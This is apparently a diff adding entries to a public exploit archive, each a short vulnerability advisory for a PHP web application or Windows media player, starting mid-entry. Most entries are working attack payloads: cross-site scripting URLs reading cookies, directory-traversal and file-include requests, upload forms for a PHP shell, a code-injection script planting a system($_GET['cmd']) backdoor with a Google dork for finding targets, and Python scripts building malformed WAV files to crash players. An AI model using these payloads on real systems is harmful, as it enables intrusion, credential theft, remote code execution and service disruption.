+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+phAlbum 1.5.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/demos/phAlbum/index.php/%F6%22%20onmouseover=document.write%28%22index.html%22%29%20// 

platforms/php/webapps/37308.txt

@@ -0,0 +1,112 @@
+source: http://www.securityfocus.com/bid/53655/info
+
+RuubikCMS is prone to multiple cross-site-scripting vulnerabilities, multiple information-disclosure vulnerabilities, and directory-traversal vulnerability.
+
+Attackers may leverage these issues to steal cookie-based authentication credentials, to execute arbitrary script code in the browser, and to retrieve arbitrary files from the affected system in the context of the affected site by using specially crafted request messages with directory-traversal sequences. This may allow the attacker to obtain sensitive information; other attacks are also possible.
+
+RuubikCMS 1.1.0 and 1.1.1 are vulnerable. 
+
+
+cross-site-scripting:
+
+http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/folders.php?type=image&folder=&feid="/>a<script>alert(1);</script>
+
+http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=&feid="</a><script>alert(1);</script>
+http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image"</a><script>alert(1);</script>&folder=&feid=owned
+http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/upload.php?feid="</a><script>alert("AkaStep");</script>
+
+http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=&find="><script>alert("AkaStep");</script>
+
+
+
+Information-disclosure:
+
+http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/error.log
+
+http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/newsmenu.php
+
+http://www.example.com/learn/ruubikcms/extra/login/session.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/dbconnection.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/extrapagemenu.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/footer.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/head.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/mainmenu.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/multilang.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/newsmenu.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/pagemenu.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/required.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/snippetmenu.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/usersmenu.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/cms/login/form.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/filelink/filelink.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tb_standalone.js.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tb_tinymce.js.php
+
+http://www.example.com/learn/ruubikcms/ruubikcms/website/scripts/jquery.lightbox-0.5.js.php
+
+
+
+Traversal vuln:
+==============SNIP==================
+<?php
+// --- Image displayer with authentication
+// --- Sample call: image.php?f=imgfile.jpg
+// --- Sample call with subfolder: image.php?f=subfolder/imgfile.jpg
+
+require('../ruubikcms/includes/dbconfig.php');
+$dbh = new PDO(PDO_DB_DRIVER.':../'.RUUBIKCMS_FOLDER.'/'.PDO_DB_FOLDER.'/'.PDO_DB_NAME); // database connection object
+require('../ruubikcms/includes/commonfunc.php');
+define('LOGOUT_TIME', query_single("SELECT logout_time FROM options WHERE id = 1"));
+require('login/session.php');
+
+// check if logged in
+if (!@$_SESSION['uid']) die("Access denied.");
+
+// images directory
+define('BASE_DIR','useruploads/images/');
+
+// make sure program execution doesn't time out
+@set_time_limit(0);
+
+if (!isset($_GET['f']) OR empty($_GET['f'])) die("Please specify image.");
+if (strstr($_GET['f'], '../')) die('Error');
+$fpath = BASE_DIR.$_GET['f'];
+if (!is_file($fpath)) die("File does not exist.");
+
+// file size in bytes
+// $fsize = filesize($fpath);
+
+// get mime type
+$mtype = '';
+
+if (function_exists('mime_content_type')) {
+  $mtype = mime_content_type($fpath);
+} elseif (function_exists('finfo_file')) {
+  $finfo = finfo_open(FILEINFO_MIME); // return mime type
+  $mtype = finfo_file($finfo, $fpath);
+  finfo_close($finfo);
+}
+
+if ($mtype == '') {
+  $mtype = "image/jpeg";
+}
+
+header("Content-type: $mtype");
+readfile($fpath);
+?>
+=====================================

platforms/php/webapps/37309.txt

@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/53656/info
+
+phpCollab is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.
+
+An attacker can exploit this issue to download backup files that contain sensitive information. Information harvested may aid in launching further attacks.
+
+phpCollab 2.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/phpcollab/includes/phpmyadmin/tbl_dump.php
+POST DATA:
+table_select%5B%5D=assignments&table_select%5B%5D=bookmarks&table_select%5B
+%5D=bookmarks_categories&table_select%5B%5D=calendar&table_select%5B%5D=fil
+es&table_select%5B%5D=invoices&table_select%5B%5D=invoices_items&table_sele
+ct%5B%5D=logs&table_select%5B%5D=members&table_select%5B%5D=newsdeskcomment
+s&table_select%5B%5D=newsdeskposts&table_select%5B%5D=notes&table_select%5B
+%5D=notifications&table_select%5B%5D=organizations&table_select%5B%5D=phase
+s&table_select%5B%5D=posts&table_select%5B%5D=projects&table_select%5B%5D=r
+eports&table_select%5B%5D=services&table_select%5B%5D=sorting&table_select%
+5B%5D=subtasks&table_select%5B%5D=support_posts&table_select%5B%5D=support_
+requests&table_select%5B%5D=tasks&table_select%5B%5D=teams&table_select%5B%
+5D=topics&table_select%5B%5D=updates&what=data&drop=1&asfile=sendit&server=
+1&lang=en&db=phpcollab

platforms/php/webapps/37310.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53659/info
+
+Ajaxmint Gallery is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view files and to execute local scripts in the context of the webserver process. This may aid in further attacks.
+
+Ajaxmint Gallery 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/learn/ajaxmint/ajaxmint-gallery/admin/index.php?c=..\..\..\..\ajaxmint-gallery/pictures/5_me.jpg%00 [aka shell] 

platforms/php/webapps/37311.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/53662/info
+
+Pligg CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Pligg CMS 1.2.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/module.php?module=captcha&action=configure&captcha=math&q_1_low=%22%3E%3Cs cript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/module.php?module=captcha&action=configure&captcha=math&q_1_high=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/module.php?module=captcha&action=configure&captcha=math&q_2_low=%22%3E%3Cs cript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/module.php?module=captcha&action=configure&captcha=math&q_2_high=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E 

platforms/php/webapps/37312.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53669/info
+
+PragmaMX is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PragmaMX 1.12.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/modules.php?name=Themetest&%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E 

platforms/php/webapps/37313.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53669/info
+ 
+PragmaMX is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+PragmaMX 1.12.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php?img_url=%22%3E%3Cscript%3E alert%28document.cookie%29;%3C/script%3E 

platforms/php/webapps/37314.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53674/info
+
+The Yellow Duck Framework is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
+
+Exploiting this vulnerability could allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
+
+Yellow Duck Framework Beta1 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?id=./database/config.php 

platforms/php/webapps/37315.txt

@@ -0,0 +1,49 @@
+source: http://www.securityfocus.com/bid/53675/info
+
+phpCollab is prone to an unauthorized-access and an arbitrary-file-upload vulnerabilities.
+
+Attackers can leverage these issues to gain unauthorized access to application data and to upload and execute arbitrary code in the context of the application.
+
+phpCollab 2.5 is vulnerable; other versions may also be affected. 
+
+POST
+/phpcollab/projects_site/uploadfile.php?PHPSESSID=f2bb0a2008d0791d1ac45a8a3
+8e51ed2&action=add&project=&task= HTTP/1.1
+Host: 192.0.0.2
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:9.0.1)
+Gecko/20100101 Firefox/9.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+DNT: 1
+Proxy-Connection: keep-alive
+Cookie: PHPSESSID=6cvltmkam146ncp3hfbucumfk6
+Referer: http://192.0.0.2/
+Content-Type: multipart/form-data;
+boundary=---------------------------19548990971636807826563613512
+Content-Length: 29914
+
+-----------------------------19548990971636807826563613512
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+100000000
+-----------------------------19548990971636807826563613512
+Content-Disposition: form-data; name="maxCustom"
+
+
+-----------------------------19548990971636807826563613512
+Content-Disposition: form-data; name="commentsField"
+
+Hello there
+-----------------------------19548990971636807826563613512
+Content-Disposition: form-data; name="upload"; filename="filename.jpg"
+Content-Type: image/jpeg
+file data stripped
+-----------------------------19548990971636807826563613512
+Content-Disposition: form-data; name="submit"
+
+Save
+-----------------------------19548990971636807826563613512--
+
+

platforms/php/webapps/37316.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53675/info
+ 
+phpCollab is prone to an unauthorized-access and an arbitrary-file-upload vulnerabilities.
+ 
+Attackers can leverage these issues to gain unauthorized access to application data and to upload and execute arbitrary code in the context of the application.
+ 
+phpCollab 2.5 is vulnerable; other versions may also be affected. 
+
+curl -i http://www.example.com/phpcollab/administration/phpinfo.php

platforms/php/webapps/37317.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/53692/info
+
+AzDGDatingMedium is prone to multiple remote vulnerabilities that includes a SQL-injection vulnerability, an information-disclosure vulnerability, a directory-traversal vulnerability and multiple cross-site scripting vulnerabilities,
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database and gain access to sensitive information.
+
+AzDGDatingMedium 1.9.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/learn/azdgscr/AzDGDatingMedium/admin/index.php?do=tedit&c_temp_edit=default&dir=../include/&f=config.inc.php%00<script>alert(1);</script>
+
+http://www.example.com/learn/azdgscr/AzDGDatingMedium/admin/index.php?do=tedit&c_temp_edit=default%00<script>alert("AkaStep");</script>&dir=../include/&f=config.inc.php
+
+http://www.example.com/learn/azdgscr/AzDGDatingMedium/admin/index.php?do=tedit&c_temp_edit=default&dir=../include/&f=config.inc.php 

platforms/php/webapps/37318.txt

@@ -0,0 +1,64 @@
+source: http://www.securityfocus.com/bid/53693/info
+
+PHPList is prone to a remote PHP code-injection vulnerability.
+
+An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+
+PHPList 2.10.9 is vulnerable; other versions may also be affected.
+
+# --------------------------------------- #
+# This PoC was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+# --------------------------------------- #
+# 1) Bug
+# 2) PoC
+# --------------------------------------- #
+# 2) Bug :
+# An attacker might execute arbitrary PHP code with this vulnerability.
+# User tainted data is embedded into a function that compiles
+# PHP code on the run and #executes it thus allowing an attacker to inject
+own PHP code that will be
+# executed. This vulnerability can lead to full server compromise.
+# Look To The File Named (Sajax.php) In Dir (admin/commonlib/lib) On Line
+(63)
+# 63. $func_name = $_POST["rs"];
+#       if (! empty($_POST["rsargs"]))
+#         $args = $_POST["rsargs"];
+#       else
+#         $args = array();
+#     }
+#
+#     if (! in_array($func_name, $sajax_export_list))
+#       echo "-:$func_name not callable";
+#     else {
+#       echo "+:";
+# 74.      $result = call_user_func_array($func_name, $args);
+#       echo $result;
+#     }
+#     exit;
+#   }
+# So We Have Variable Func Name With Post rs :)
+# In Above Of Code We Have $_GET['rs']; So This Is An Attacker Wan't It.
+# Look To Line (74).
+# Call_User_Func_Array($func_name, $args);
+# Attacker Can Inject In Get Paramater Or POST PHP Code.
+# --------------------------------------- #
+# 3) PoC :
+# <?php
+# $target = $argv[1];
+# $ch = curl_init();
+# curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
+# curl_setopt($ch, CURLOPT_URL, "http://$target/Sajax.php");
+# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01;
+Windows NT 5.0)");
+# curl_setopt($ch, CURLOPT_POST, 1);
+# curl_setopt($ch, CURLOPT_POSTFIELDS, "rs=whoami");
+# curl_setopt($ch, CURLOPT_TIMEOUT, 3);
+# curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
+# curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
+# curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
+# $buf = curl_exec ($ch);
+# curl_close($ch);
+# unset($ch);
+# echo $buf;
+# ?>

platforms/php/webapps/37321.txt

@@ -0,0 +1,50 @@
+source: http://www.securityfocus.com/bid/53696/info
+
+DynPage is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+DynPage 1.0 is vulnerable; other versions may also be affected. 
+
+########>>>>> Explo!T <<<<<<##################
+
+# Download : [http://www.dynpage.net/download/dynpage.zip]
+
+### [ Upload Sh3LL.php;.txt ] =>
+
+<form action="http://www.example.com/[path]/js/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Files" method="post" enctype="multipart/form-data" >
+<input name="Files" type="file" class="submit" size="80">
+<input type="submit" value="Upload !">
+</form>
+
+
+
+### [ Upload Sh3LL.php;.gif ;.jpeg ] =>
+
+<!-- p0c 1 -->
+<form action="http://www.example.com/[path]/js/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Images" method="post" enctype="multipart/form-data" >
+<input name="Images" type="file" class="submit" size="80">
+<input type="submit" value="Upload !">
+</form>
+
+<!-- p0c 2 -->
+<form action="http://www.example.com/[path]/js/ckfinder/ckfinder.html?Type=Images" method="post" enctype="multipart/form-data" >
+<input name="Images" type="file" class="submit" size="80">
+<input type="submit" value="Upload !">
+</form>
+
+
+### [ Upload Sh3LL.php;.swf ;.flv ] =>
+
+<!-- p0c 1 -->
+<form action="http://www.example.com/[path]/js/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Flash" method="post" enctype="multipart/form-data" >
+<input name="Images" type="file" class="submit" size="80">
+<input type="submit" value="Upload !">
+</form>
+
+<!-- p0c 2 -->
+<form action="http://www.example.com/[path]/js/ckfinder/ckfinder.html?Type=Flash" method="post" enctype="multipart/form-data" >
+<input name="Images" type="file" class="submit" size="80">
+<input type="submit" value="Upload !">
+</form>
+############# << ThE|End

platforms/php/webapps/37328.php

@@ -0,0 +1,35 @@
+source: http://www.securityfocus.com/bid/53703/info
+
+Small-Cms is prone to a remote PHP code-injection vulnerability.
+
+An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying computer; other attacks are also possible. 
+
+<?php
+# Author : L3b-r1'z
+# Title : Small Cms Php Code Injection
+# Date : 5/25/2012
+# Email : L3b-r1z@hotmail.com
+# Site : Sec4Ever.Com & Exploit4Arab.Com
+# Google Dork : allintext: "Copyright © 2012 . Small-Cms "
+# -------- Put Target As site.com Just (site.com) -------- #
+$target = $argv[1];
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
+curl_setopt($ch, CURLOPT_URL, "http://$target/install.php?
+step=2&action=w");
+curl_setopt($ch, CURLOPT_HTTPGET, 1);
+curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01;
+Windows NT 5.0)");
+curl_setopt($ch, CURLOPT_POST, 1);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+"hostname=LOL%22%3B%3F%3E%3C%3Fsystem(%24_GET%5B'cmd'%5D)%3B%3F%3E%3C%3F%22LOL&username=sssss&password=sssss&database=sssss");
+curl_setopt($ch, CURLOPT_TIMEOUT, 3);
+curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
+curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
+curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
+$buf = curl_exec ($ch);
+curl_close($ch);
+unset($ch);
+echo $buf;
+# Curl By : RipS
+?>

platforms/php/webapps/37329.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/53708/info
+
+Nilehoster Topics Viewer is prone to multiple SQL-injection vulnerabilities and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. By using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.
+
+Topics Viewer 2.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com//search.php?q=[SQLi]
+
+http://www.example.com//lost.php/ [SQLi]
+
+http://www.example.com/footer.php? [LFI] 

platforms/php/webapps/37330.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53709/info
+
+Yamamah Photo Gallery is prone to an information-disclosure vulnerability.
+
+An attacker can exploit this issue to download the database that contain sensitive information. Information harvested may aid in launching further attacks.
+
+Yamamah 1.1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/yamamah/cp/export.php 

platforms/php/webapps/37331.py

@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/53711/info
+
+WHMCS (WHM Complete Solution) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+########################################
+# First found around September 2011~
+# Kept 0day because killing bugs is cruise control for gay.
+# Author: dx7r
+# fuck off.
+# if you use this now, you're a moron. lots of love.
+#######################################
+import urllib2
+import urllib
+import os
+
+def regglobcheck():
+        regglob1 = urllib2.Request('http://127.0.0.1/whmcs/whmcs_v451/whmcs/modules/gateways/boleto/boleto_bb.php?dadosboleto[identificacao]=test')
+        regglob2 = urllib2.urlopen(regglob1)
+        regglob3 = regglob2.read().count('test')
+        if regglob3 == 0:
+                rgen = 0
+                print " [+] Register Globals not enabled, no sqli on this whmcs install"
+        elif regglob3 >= 1:
+                rgen = 1
+                print " [+] Register Globals enabled, own it."
+
+regglobcheck()

platforms/windows/dos/37326.py

@@ -0,0 +1,32 @@
+#!/usr/bin/python
+
+#[+] Author: Rajganesh (Raj) Pandurangan
+#[+] Exploit Title:  WinylPlayer 3.0.3 Memory Corruption PoC
+#[+] Date: 06-17-2015
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7 
+#[+] Vendor: http://vinylsoft.com/
+#[+] Download: http://vinylsoft.com/download/winyl_setup.zip
+#[+] Sites: www.exclarus.com
+#[+] Twitter: @rajganeshp
+#[+] Thanks:   offensive security (@offsectraining)
+
+
+print"###########################################################"
+print"#  Title: WinylPlayer 3.0.3 Memory Corruption PoC          #"
+print"#  Author: Rajganesh Pandurangan                           #"
+print"#  Category: DoS/PoC                                       # "
+print"###########################################################"
+	
+header = ("\x52\x49\x46\x46\x64\x31\x10\x00\x57\x41\x56\x45\x66\x6d\x74\x20"
+"\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x10\xb1\x02\x00"
+"\x04\x00\x00\x00\x64\x61\x74\x61\x40\x31\x10\x00\x14\x00\x2a\x00"
+"\x1a\x00\x30\x00\x26\x00\x39\x00\x35\x00\x3c\x00\x4a\x00\x3a\x00"
+"\x5a\x00\x2f\x00\x67\x00\x0a")
+
+exploit = header
+exploit += "\x41" * 900000
+
+crash = open('crash.wav','w')
+crash.write(exploit)
+crash.close()

platforms/windows/dos/37327.py

@@ -0,0 +1,32 @@
+#!/usr/bin/python
+
+#[+] Author: Rajganesh (Raj) Pandurangan
+#[+] Exploit Title:  HansoPlayer 3.4.0 Memory Corruption PoC
+#[+] Date: 06-17-2015
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7 
+#[+] Vendor: http://www.hansotools.com
+#[+] Download: http://www.hansotools.com/downloads/hanso-player-setup.exe
+#[+] Sites: www.exclarus.com
+#[+] Twitter: @rajganeshp
+#[+] Thanks:   offensive security (@offsectraining)
+
+
+print"###########################################################"
+print"#  Title: HansoPlayer 3.4.0 Memory Corruption PoC          #"
+print"#  Author: Rajganesh Pandurangan                           #"
+print"#  Category: DoS/PoC                                       # "
+print"###########################################################"
+	
+header = ("\x52\x49\x46\x46\x64\x31\x10\x00\x57\x41\x56\x45\x66\x6d\x74\x20"
+"\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x10\xb1\x02\x00"
+"\x04\x00\x00\x00\x64\x61\x74\x61\x40\x31\x10\x00\x14\x00\x2a\x00"
+"\x1a\x00\x30\x00\x26\x00\x39\x00\x35\x00\x3c\x00\x4a\x00\x3a\x00"
+"\x5a\x00\x2f\x00\x67\x00\x0a")
+
+exploit = header
+exploit += "\x41" * 900000
+
+crash = open('crash.wav','w')
+crash.write(exploit)
+crash.close()